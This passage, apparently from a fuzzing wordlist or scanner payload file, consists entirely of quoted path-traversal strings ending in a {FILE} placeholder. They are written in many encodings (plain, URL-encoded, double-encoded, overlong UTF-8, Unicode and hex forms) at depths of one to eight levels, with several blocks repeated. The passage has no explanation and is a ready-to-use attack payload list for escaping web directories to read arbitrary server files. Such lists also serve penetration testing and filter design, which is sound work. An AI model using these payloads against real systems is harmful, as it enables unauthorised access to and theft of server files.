FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","..\\{FILE}","..\\..\\{FILE}","..\\..\\..\\{FILE}","..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%5c{FILE}","..%5c..%5c{FILE}","..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","..%255c{FILE}","..%255c..%255c{FILE}","..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","../{FILE}","../../{FILE}","../../../{FILE}","../../../../{FILE}","../../../../../{FILE}","../../../../../../{FILE}","../../../../../../../{FILE}","../../../../../../../../{FILE}","..%2f{FILE}","..%2f..%2f{FILE}","..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","%2e%2e/{FILE}","%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","..%252f{FILE}","..%252f..%252f{FILE}","..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","%252e%252e/{FILE}","%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","..\\{FILE}","..\\..\\{FILE}","..\\..\\..\\{FILE}","..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%5c{FILE}","..%5c..%5c{FILE}","..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","..%255c{FILE}","..%255c..%255c{FILE}","..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","\\../{FILE}","\\../\\../{FILE}","\\../\\../\\../{FILE}","\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../\\../\\../\\../{FILE}","/..\\{FILE}","/..\\/..\\{FILE}","/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",".../{FILE}",".../.../{FILE}",".../.../.../{FILE}",".../.../.../.../{FILE}",".../.../.../.../.../{FILE}",".../.../.../.../.../.../{FILE}",".../.../.../.../.../.../.../{FILE}",".../.../.../.../.../.../.../.../{FILE}","...\\{FILE}","...\\...\\{FILE}","...\\...\\...\\{FILE}","...\\...\\...\\...\\{FILE}","...\\...\\...\\...\\...\\{FILE}","...\\...\\...\\...\\...\\...\\{FILE}","...\\...\\...\\...\\...\\...\\...\\{FILE}","...\\...\\...\\...\\...\\...\\...\\...\\{FILE}","..../{FILE}","..../..../{FILE}","..../..../..../{FILE}","..../..../..../..../{FILE}","..../..../..../..../..../{FILE}","..../..../..../..../..../..../{FILE}","..../..../..../..../..../..../..../{FILE}","..../..../..../..../..../..../..../..../{FILE}","....\\{FILE}","....\\....\\{FILE}","....\\....\\....\\{FILE}","....\\....\\....\\....\\{FILE}","....\\....\\....\\....\\....\\{FILE}","....\\....\\....\\....\\....\\....\\{FILE}","....\\....\\....\\....\\....\\....\\....\\{FILE}","....\\....\\....\\....\\....\\....\\....\\....\\{FILE}","........................................................................../{FILE}","........................................................................../../{FILE}","........................................................................../../../{FILE}","........................................................................../../../../{FILE}","........................................................................../../../../../{FILE}","........................................................................../../../../../../{FILE}","........................................................................../../../../../../../{FILE}","........................................................................../../../../../../../../{FILE}","..........................................................................\\{FILE}","..........................................................................\\..\\{FILE}","..........................................................................\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%u2215{FILE}","..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}","%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","..%u2216{FILE}","..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%uEFC8{FILE}","..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uF025{FILE}","..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","..0x2f{FILE}","..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","..0x5c{FILE}","..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","..%c0%2f{FILE}","..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","..%c0%5c{FILE}","..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%